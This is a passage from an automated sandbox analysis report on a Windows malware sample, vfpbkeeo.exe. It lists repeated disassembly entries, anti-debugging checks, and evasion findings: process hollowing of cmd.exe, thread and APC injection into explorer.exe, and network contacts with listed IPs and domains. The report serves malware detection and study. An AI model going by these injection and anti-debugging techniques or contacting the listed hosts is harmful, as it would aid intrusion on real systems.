          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A74015 mov eax, dword ptr fs:[00000030h]3_2_00A74015
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A74015 mov eax, dword ptr fs:[00000030h]3_2_00A74015
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A27016 mov eax, dword ptr fs:[00000030h]3_2_00A27016
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A27016 mov eax, dword ptr fs:[00000030h]3_2_00A27016
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A27016 mov eax, dword ptr fs:[00000030h]3_2_00A27016
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C0050 mov eax, dword ptr fs:[00000030h]3_2_009C0050
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C0050 mov eax, dword ptr fs:[00000030h]3_2_009C0050
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A71074 mov eax, dword ptr fs:[00000030h]3_2_00A71074
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A62073 mov eax, dword ptr fs:[00000030h]3_2_00A62073
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DA185 mov eax, dword ptr fs:[00000030h]3_2_009DA185
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CC182 mov eax, dword ptr fs:[00000030h]3_2_009CC182
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AB1E1 mov eax, dword ptr fs:[00000030h]3_2_009AB1E1
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AB1E1 mov eax, dword ptr fs:[00000030h]3_2_009AB1E1
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AB1E1 mov eax, dword ptr fs:[00000030h]3_2_009AB1E1
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A9100 mov eax, dword ptr fs:[00000030h]3_2_009A9100
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A9100 mov eax, dword ptr fs:[00000030h]3_2_009A9100
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A9100 mov eax, dword ptr fs:[00000030h]3_2_009A9100
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D513A mov eax, dword ptr fs:[00000030h]3_2_009D513A
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D513A mov eax, dword ptr fs:[00000030h]3_2_009D513A
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C4120 mov eax, dword ptr fs:[00000030h]3_2_009C4120
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C4120 mov eax, dword ptr fs:[00000030h]3_2_009C4120
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C4120 mov eax, dword ptr fs:[00000030h]3_2_009C4120
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C4120 mov eax, dword ptr fs:[00000030h]3_2_009C4120
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C4120 mov ecx, dword ptr fs:[00000030h]3_2_009C4120
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CB944 mov eax, dword ptr fs:[00000030h]3_2_009CB944
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CB944 mov eax, dword ptr fs:[00000030h]3_2_009CB944
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AB171 mov eax, dword ptr fs:[00000030h]3_2_009AB171
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AB171 mov eax, dword ptr fs:[00000030h]3_2_009AB171
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DD294 mov eax, dword ptr fs:[00000030h]3_2_009DD294
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DD294 mov eax, dword ptr fs:[00000030h]3_2_009DD294
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009BAAB0 mov eax, dword ptr fs:[00000030h]3_2_009BAAB0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009BAAB0 mov eax, dword ptr fs:[00000030h]3_2_009BAAB0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DFAB0 mov eax, dword ptr fs:[00000030h]3_2_009DFAB0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A52A5 mov eax, dword ptr fs:[00000030h]3_2_009A52A5
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A52A5 mov eax, dword ptr fs:[00000030h]3_2_009A52A5
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A52A5 mov eax, dword ptr fs:[00000030h]3_2_009A52A5
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A52A5 mov eax, dword ptr fs:[00000030h]3_2_009A52A5
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A52A5 mov eax, dword ptr fs:[00000030h]3_2_009A52A5
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C3A1C mov eax, dword ptr fs:[00000030h]3_2_009C3A1C
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A5B260 mov eax, dword ptr fs:[00000030h]3_2_00A5B260
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A5B260 mov eax, dword ptr fs:[00000030h]3_2_00A5B260
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A78A62 mov eax, dword ptr fs:[00000030h]3_2_00A78A62
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A9240 mov eax, dword ptr fs:[00000030h]3_2_009A9240
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A9240 mov eax, dword ptr fs:[00000030h]3_2_009A9240
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A9240 mov eax, dword ptr fs:[00000030h]3_2_009A9240
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A9240 mov eax, dword ptr fs:[00000030h]3_2_009A9240
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E927A mov eax, dword ptr fs:[00000030h]3_2_009E927A
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A75BA5 mov eax, dword ptr fs:[00000030h]3_2_00A75BA5
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DB390 mov eax, dword ptr fs:[00000030h]3_2_009DB390
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B1B8F mov eax, dword ptr fs:[00000030h]3_2_009B1B8F
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B1B8F mov eax, dword ptr fs:[00000030h]3_2_009B1B8F
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A5D380 mov ecx, dword ptr fs:[00000030h]3_2_00A5D380
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A6138A mov eax, dword ptr fs:[00000030h]3_2_00A6138A
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A6131B mov eax, dword ptr fs:[00000030h]3_2_00A6131B
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AF358 mov eax, dword ptr fs:[00000030h]3_2_009AF358
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009ADB40 mov eax, dword ptr fs:[00000030h]3_2_009ADB40
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D3B7A mov eax, dword ptr fs:[00000030h]3_2_009D3B7A
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D3B7A mov eax, dword ptr fs:[00000030h]3_2_009D3B7A
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009ADB60 mov ecx, dword ptr fs:[00000030h]3_2_009ADB60
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A78B58 mov eax, dword ptr fs:[00000030h]3_2_00A78B58
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A26CF0 mov eax, dword ptr fs:[00000030h]3_2_00A26CF0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A26CF0 mov eax, dword ptr fs:[00000030h]3_2_00A26CF0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A26CF0 mov eax, dword ptr fs:[00000030h]3_2_00A26CF0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A614FB mov eax, dword ptr fs:[00000030h]3_2_00A614FB
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A78CD6 mov eax, dword ptr fs:[00000030h]3_2_00A78CD6
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]3_2_00A61C06
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]3_2_00A61C06
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]3_2_00A61C06
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]3_2_00A61C06
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]3_2_00A61C06
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]3_2_00A61C06
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]3_2_00A61C06
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]3_2_00A61C06
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]3_2_00A61C06
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]3_2_00A61C06
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]3_2_00A61C06
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]3_2_00A61C06
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]3_2_00A61C06
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]3_2_00A61C06
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A26C0A mov eax, dword ptr fs:[00000030h]3_2_00A26C0A
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A26C0A mov eax, dword ptr fs:[00000030h]3_2_00A26C0A
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A26C0A mov eax, dword ptr fs:[00000030h]3_2_00A26C0A
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A26C0A mov eax, dword ptr fs:[00000030h]3_2_00A26C0A
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A7740D mov eax, dword ptr fs:[00000030h]3_2_00A7740D
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A7740D mov eax, dword ptr fs:[00000030h]3_2_00A7740D
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A7740D mov eax, dword ptr fs:[00000030h]3_2_00A7740D
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DBC2C mov eax, dword ptr fs:[00000030h]3_2_009DBC2C
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C746D mov eax, dword ptr fs:[00000030h]3_2_009C746D
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3C450 mov eax, dword ptr fs:[00000030h]3_2_00A3C450
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3C450 mov eax, dword ptr fs:[00000030h]3_2_00A3C450
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DFD9B mov eax, dword ptr fs:[00000030h]3_2_009DFD9B
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DFD9B mov eax, dword ptr fs:[00000030h]3_2_009DFD9B
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A2D8A mov eax, dword ptr fs:[00000030h]3_2_009A2D8A
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A2D8A mov eax, dword ptr fs:[00000030h]3_2_009A2D8A
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A2D8A mov eax, dword ptr fs:[00000030h]3_2_009A2D8A
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A2D8A mov eax, dword ptr fs:[00000030h]3_2_009A2D8A
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A2D8A mov eax, dword ptr fs:[00000030h]3_2_009A2D8A
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D35A1 mov eax, dword ptr fs:[00000030h]3_2_009D35A1
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A58DF1 mov eax, dword ptr fs:[00000030h]3_2_00A58DF1
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A78D34 mov eax, dword ptr fs:[00000030h]3_2_00A78D34
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A2A537 mov eax, dword ptr fs:[00000030h]3_2_00A2A537
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D4D3B mov eax, dword ptr fs:[00000030h]3_2_009D4D3B
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D4D3B mov eax, dword ptr fs:[00000030h]3_2_009D4D3B
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D4D3B mov eax, dword ptr fs:[00000030h]3_2_009D4D3B
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AAD30 mov eax, dword ptr fs:[00000030h]3_2_009AAD30
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]3_2_009B3D34
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]3_2_009B3D34
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]3_2_009B3D34
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]3_2_009B3D34
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]3_2_009B3D34
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]3_2_009B3D34
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]3_2_009B3D34
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]3_2_009B3D34
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]3_2_009B3D34
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]3_2_009B3D34
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]3_2_009B3D34
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]3_2_009B3D34
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]3_2_009B3D34
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C7D50 mov eax, dword ptr fs:[00000030h]3_2_009C7D50
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E3D43 mov eax, dword ptr fs:[00000030h]3_2_009E3D43
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A23540 mov eax, dword ptr fs:[00000030h]3_2_00A23540
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CC577 mov eax, dword ptr fs:[00000030h]3_2_009CC577
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CC577 mov eax, dword ptr fs:[00000030h]3_2_009CC577
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A70EA5 mov eax, dword ptr fs:[00000030h]3_2_00A70EA5
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A70EA5 mov eax, dword ptr fs:[00000030h]3_2_00A70EA5
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A70EA5 mov eax, dword ptr fs:[00000030h]3_2_00A70EA5
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A246A7 mov eax, dword ptr fs:[00000030h]3_2_00A246A7
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3FE87 mov eax, dword ptr fs:[00000030h]3_2_00A3FE87
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D36CC mov eax, dword ptr fs:[00000030h]3_2_009D36CC
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E8EC7 mov eax, dword ptr fs:[00000030h]3_2_009E8EC7
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A5FEC0 mov eax, dword ptr fs:[00000030h]3_2_00A5FEC0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A78ED6 mov eax, dword ptr fs:[00000030h]3_2_00A78ED6
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B76E2 mov eax, dword ptr fs:[00000030h]3_2_009B76E2
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D16E0 mov ecx, dword ptr fs:[00000030h]3_2_009D16E0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A5FE3F mov eax, dword ptr fs:[00000030h]3_2_00A5FE3F
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AC600 mov eax, dword ptr fs:[00000030h]3_2_009AC600
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AC600 mov eax, dword ptr fs:[00000030h]3_2_009AC600
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AC600 mov eax, dword ptr fs:[00000030h]3_2_009AC600
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AE620 mov eax, dword ptr fs:[00000030h]3_2_009AE620
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h]3_2_009B7E41
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h]3_2_009B7E41
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h]3_2_009B7E41
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h]3_2_009B7E41
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h]3_2_009B7E41
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h]3_2_009B7E41
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CAE73 mov eax, dword ptr fs:[00000030h]3_2_009CAE73
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CAE73 mov eax, dword ptr fs:[00000030h]3_2_009CAE73
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CAE73 mov eax, dword ptr fs:[00000030h]3_2_009CAE73
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CAE73 mov eax, dword ptr fs:[00000030h]3_2_009CAE73
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CAE73 mov eax, dword ptr fs:[00000030h]3_2_009CAE73
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B766D mov eax, dword ptr fs:[00000030h]3_2_009B766D
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A27794 mov eax, dword ptr fs:[00000030h]3_2_00A27794
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A27794 mov eax, dword ptr fs:[00000030h]3_2_00A27794
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A27794 mov eax, dword ptr fs:[00000030h]3_2_00A27794
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A7070D mov eax, dword ptr fs:[00000030h]3_2_00A7070D
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A7070D mov eax, dword ptr fs:[00000030h]3_2_00A7070D
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DE730 mov eax, dword ptr fs:[00000030h]3_2_009DE730
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3FF10 mov eax, dword ptr fs:[00000030h]3_2_00A3FF10
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3FF10 mov eax, dword ptr fs:[00000030h]3_2_00A3FF10
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A4F2E mov eax, dword ptr fs:[00000030h]3_2_009A4F2E
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A4F2E mov eax, dword ptr fs:[00000030h]3_2_009A4F2E
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A78F6A mov eax, dword ptr fs:[00000030h]3_2_00A78F6A
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009BEF40 mov eax, dword ptr fs:[00000030h]3_2_009BEF40
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009BFF60 mov eax, dword ptr fs:[00000030h]3_2_009BFF60
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0040CF93 LdrLoadDll,3_2_0040CF93
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_004018B6 SetUnhandledExceptionFilter,1_2_004018B6
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_00401754 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00401754
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_0040632B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0040632B
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_00401BB3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00401BB3

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 85.187.128.34 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.94 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 45.33.30.197 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.un-object.com
          Source: C:\Windows\explorer.exeDomain query: www.energyservicestation.com
          Source: C:\Windows\explorer.exeNetwork Connect: 78.141.192.145 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.white-hat.uk
          Source: C:\Windows\explorer.exeDomain query: www.thewildphotographer.co.uk
          Source: C:\Windows\explorer.exeDomain query: www.shapshit.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.18.198 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.17.12 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.thedivinerudraksha.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.192.30.147 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.bitservicesltd.com
          Source: C:\Windows\explorer.exeDomain query: www.younrock.com
          Source: C:\Windows\explorer.exeDomain query: www.gritslab.com
          Source: C:\Windows\explorer.exeNetwork Connect: 161.97.163.8 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.222ambking.org
          Source: C:\Windows\explorer.exeDomain query: www.fclaimrewardccpointq.shop
          Source: C:\Windows\explorer.exeNetwork Connect: 94.176.104.86 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 213.145.228.111 80Jump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: D90000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeThread register set: target process: 3528Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 3528Jump to behavior
